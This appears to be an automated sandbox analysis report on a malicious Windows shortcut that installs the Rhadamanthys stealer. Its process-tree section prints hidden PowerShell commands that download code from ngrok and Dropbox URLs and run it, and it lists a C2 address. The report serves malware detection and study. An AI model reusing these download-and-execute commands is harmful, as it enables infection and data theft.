Edit tour
Windows
Analysis Report
taCCGTk8n1.lnk
Overview
General Information
Sample name: | taCCGTk8n1.lnkrenamed because original name is a hash value |
Original sample name: | 48ea3e8097aa3314fc7fbfb73abdc072031989ef9ba14ff669d40c0633d13845.lnk |
Analysis ID: | 1572662 |
MD5: | 791c4736be53604b8bb0979bac3a49b8 |
SHA1: | 6c406a9f2942d6fbe7d5df5a9b6b050c250c4a4e |
SHA256: | 48ea3e8097aa3314fc7fbfb73abdc072031989ef9ba14ff669d40c0633d13845 |
Tags: | Compilazioneprotetticopyrightlnkuser-JAMESWT_MHT |
Infos: | |
Detection
RHADAMANTHYS
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected RHADAMANTHYS Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops large PE files
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Powerup Write Hijack DLL
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows shortcut file (LNK) contains suspicious command line arguments
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Detected suspicious crossdomain redirect
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Classification
- System is w10x64
- cmd.exe (PID: 5232 cmdline:
"C:\Window s\System32 \cmd.exe" /c pOweRsH eLL -wIndo WStYLe hiD deN -c set -alias a0b 802 curl ; sal 9bdb9 9 iEx ; 9b db99(a0b80 2 -Uri htt ps://7bz5n c0bdyga37s cjk9otosvc vcl5wyc.ng rok.app/ap i/secure/2 20836f7ecc 9edc92da59 31044d3532 a -UseBasi cParsing) MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2748 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 712 cmdline:
pOweRsHeLL -wIndoWSt YLe hiDdeN -c set-al ias a0b802 curl ; sa l 9bdb99 i Ex ; 9bdb9 9(a0b802 - Uri https: //7bz5nc0b dyga37scjk 9otosvcvcl 5wyc.ngrok .app/api/s ecure/2208 36f7ecc9ed c92da59310 44d3532a - UseBasicPa rsing) MD5: 04029E121A0CFA5991749937DD22A1D9) - msedge.exe (PID: 2644 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --kiosk https://w ww.dropbox .com/scl/f i/dgiur64v awmdx9alqw 6et/Lewis- Silkin-LLP .pdf?rlkey =kduhqrnp0 0rj44rjepp uw31qk&dl= 1 MD5: BF154738460E4AB1D388970E1AB13FAB) - msedge.exe (PID: 2812 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=23 04 --field -trial-han dle=2088,i ,429067610 7445022345 ,380600902 0306178634 ,262144 /p refetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB) - cmd.exe (PID: 4976 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Local \Temp\6979 63187.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2524 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6976 cmdline:
powershell -WindowSt yle Hidden -Command "$Random PDF = \"$e nv:temp\$( Get-Random ).pdf\"; $ RandomEXE = \"$env:t emp\$(Get- Random).ex e\"; IWR - Uri 'https ://www.dro pbox.com/s cl/fi/dgiu r64vawmdx9 alqw6et/Le wis-Silkin -LLP.pdf?r lkey=kduhq rnp00rj44r jeppuw31qk &dl=1' -Ou tFile $Ran domPDF ; Start-Proc ess msedge .exe -Argu mentList \ "--kiosk $ RandomPDF\ " ; IWR -U ri 'https: //www.drop box.com/sc l/fi/qzqf3 fr40w71dq8 uwcnec/run ner.exe?rl key=dfl8hx amjpp5zdy8 yzn5ejrol& dl=1' -Out File $Rand omEXE ; st art $Rando mEXE" MD5: 04029E121A0CFA5991749937DD22A1D9) - msedge.exe (PID: 9032 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --kiosk C:\Users\ user\AppDa ta\Local\T emp\122542 8425.pdf MD5: BF154738460E4AB1D388970E1AB13FAB) - msedge.exe (PID: 8812 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=21 88 --field -trial-han dle=2108,i ,107348614 7508724422 2,18214222 2885035954 43,262144 /prefetch: 3 MD5: BF154738460E4AB1D388970E1AB13FAB) - 1718218388.exe (PID: 6780 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\171821 8388.exe" MD5: DFED8A8BF0531716FD932A0A81CB14CD) - 1718218388.exe (PID: 4236 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\171821 8388.exe" MD5: DFED8A8BF0531716FD932A0A81CB14CD) - fontdrvhost.exe (PID: 8560 cmdline:
"C:\Window s\System32 \fontdrvho st.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D) - fontdrvhost.exe (PID: 5688 cmdline:
"C:\Window s\System32 \fontdrvho st.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F) - WerFault.exe (PID: 2792 cmdline:
C:\Windows \system32\ WerFault.e xe -u -p 5 688 -s 136 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0) - WerFault.exe (PID: 8484 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 4 236 -s 432 MD5: C31336C1EFC2CCB44B4326EA793040F2)
- svchost.exe (PID: 5664 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- msedge.exe (PID: 5440 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --kiosk --flag-sw itches-beg in --flag- switches-e nd --disab le-nacl -- do-not-de- elevate ht tps://www. dropbox.co m/scl/fi/d giur64vawm dx9alqw6et /Lewis-Sil kin-LLP.pd f?rlkey=kd uhqrnp00rj 44rjeppuw3 1qk&dl=1 MD5: BF154738460E4AB1D388970E1AB13FAB) - msedge.exe (PID: 7420 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=20 92 --field -trial-han dle=2040,i ,357761897 9646503698 ,548280931 1982956189 ,262144 /p refetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB) - msedge.exe (PID: 8264 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=ass et_store.m ojom.Asset StoreServi ce --lang= en-GB --se rvice-sand box-type=a sset_store _service - -mojo-plat form-chann el-handle= 6520 --fie ld-trial-h andle=2040 ,i,3577618 9796465036 98,5482809 3119829561 89,262144 /prefetch: 8 MD5: BF154738460E4AB1D388970E1AB13FAB) - msedge.exe (PID: 8276 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=ent ity_extrac tion_servi ce.mojom.E xtractor - -lang=en-G B --servic e-sandbox- type=entit y_extracti on --onnx- enabled-fo r-ee --moj o-platform -channel-h andle=6808 --field-t rial-handl e=2040,i,3 5776189796 46503698,5 4828093119 82956189,2 62144 /pre fetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB) - identity_helper.exe (PID: 8432 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \117.0.204 5.55\ident ity_helper .exe" --ty pe=utility --utility -sub-type= winrt_app_ id.mojom.W inrtAppIdS ervice --l ang=en-GB --service- sandbox-ty pe=none -- mojo-platf orm-channe l-handle=5 004 --fiel d-trial-ha ndle=2040, i,35776189 7964650369 8,54828093 1198295618 9,262144 / prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306) - identity_helper.exe (PID: 8468 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \117.0.204 5.55\ident ity_helper .exe" --ty pe=utility --utility -sub-type= winrt_app_ id.mojom.W inrtAppIdS ervice --l ang=en-GB --service- sandbox-ty pe=none -- mojo-platf orm-channe l-handle=5 004 --fiel d-trial-ha ndle=2040, i,35776189 7964650369 8,54828093 1198295618 9,262144 / prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306) - msedge.exe (PID: 9048 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=edg e_collecti ons.mojom. Collection sDataManag er --lang= en-GB --se rvice-sand box-type=c ollections --mojo-pl atform-cha nnel-handl e=7388 --f ield-trial -handle=20 40,i,35776 1897964650 3698,54828 0931198295 6189,26214 4 /prefetc h:8 MD5: BF154738460E4AB1D388970E1AB13FAB) - msedge.exe (PID: 7656 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= ppapi --la ng=en-GB - -device-sc ale-factor =1 --ppapi -antialias ed-text-en abled=1 -- ppapi-subp ixel-rende ring-setti ng=1 --moj o-platform -channel-h andle=8888 --field-t rial-handl e=2040,i,3 5776189796 46503698,5 4828093119 82956189,2 62144 /pre fetch:6 MD5: BF154738460E4AB1D388970E1AB13FAB) - msedge.exe (PID: 8352 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=edg e_search_i ndexer.moj om.SearchI ndexerInte rfaceBroke r --lang=e n-GB --ser vice-sandb ox-type=se arch_index er --messa ge-loop-ty pe-ui --mo jo-platfor m-channel- handle=681 6 --field- trial-hand le=2040,i, 3577618979 646503698, 5482809311 982956189, 262144 /pr efetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Rhadamanthys | According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search user. |
{"C2 url": "https://104.161.43.18:2845/7e56fc199c7194d0/h4qwbjtf.qjde4"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security | ||
JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
Click to see the 5 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
Click to see the 1 entries |
System Summary |
---|
Source: | Author: Subhash Popuri (@pbssubhash): |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: vburov: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-10T18:40:24.854097+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49731 | 162.125.65.18 | 443 | TCP |
2024-12-10T18:40:38.320821+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49817 | 162.125.65.18 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-10T18:41:11.285923+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 104.161.43.18 | 2845 | 192.168.2.6 | 49908 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: |
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | Joe Sandbox ML: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 33_2_000001B9A47B0511 |
Networking |
---|
Source: | Suricata IDS: |
Source: | URLs: |
Source: | TCP traffic: |
Source: | HTTP traffic: |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: |
Source: | JA3 fingerprint: |
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |